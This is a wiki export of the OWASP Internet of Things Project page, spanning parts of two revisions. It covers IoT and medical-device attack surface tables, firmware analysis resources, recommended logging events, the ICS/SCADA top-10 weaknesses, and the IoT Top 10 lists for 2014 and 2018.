| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246182OWASP Internet of Things Project2018-12-19T23:41:17Z<p>Aaron.guzman: /* Philosophy */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the 2018 OWASP IoT Top 10.<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: CSA IoT Controls Matrix, CTIA, Stanford’s Secure Internet of Things Project, NISTIR 8200, ENISA IoT Baseline Report, Code of Practice for Consumer IoT Security, and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
''The OWASP IoT Security Team, 2018''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
